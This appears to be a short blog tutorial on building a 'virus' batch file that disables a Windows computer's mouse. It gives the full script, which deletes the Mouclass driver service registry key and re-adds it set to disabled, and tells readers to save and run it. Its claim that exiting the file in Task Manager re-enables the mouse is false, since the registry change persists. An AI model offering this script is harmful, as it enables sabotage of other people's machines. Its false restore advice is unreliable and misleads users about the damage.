I previously posted many tricks on making batch files like chat with command prompt, make pendrive to turn off system automatically, matrix effect. In this batch file I will tell you how to disable mouse. You just have to copy a code. I have provided the code below.
![]() |
Make A Virus That Disable Mouse |
Virus To Disable Mouse
- Open your Notepad and copy the code given below:
rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem ---------------------------------
- Now save this file as virus.bat.
- You have created the virus.
- After opening this file your mouse will be disabled.
You can re-enable your from task manager. You just have to exit this file from command prompt.
Are You Facing Problem Or Need Help Than Do Comment
Are You Facing Problem Or Need Help Than Do Comment